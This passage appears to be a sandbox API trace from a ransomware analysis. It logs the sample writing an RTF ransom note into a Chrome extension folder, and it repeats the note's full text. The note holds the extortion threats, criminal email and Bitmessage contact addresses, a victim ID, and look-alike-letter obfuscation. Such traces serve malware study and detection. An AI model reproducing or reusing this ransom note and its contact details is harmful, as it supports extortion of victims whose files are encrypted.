{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.297] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.298] CloseHandle (hObject=0x294) returned 1 [0285.298] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\#readme_eman#.rtf")) returned 0xffffffff [0285.298] GetLastError () returned 0x2 [0285.298] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 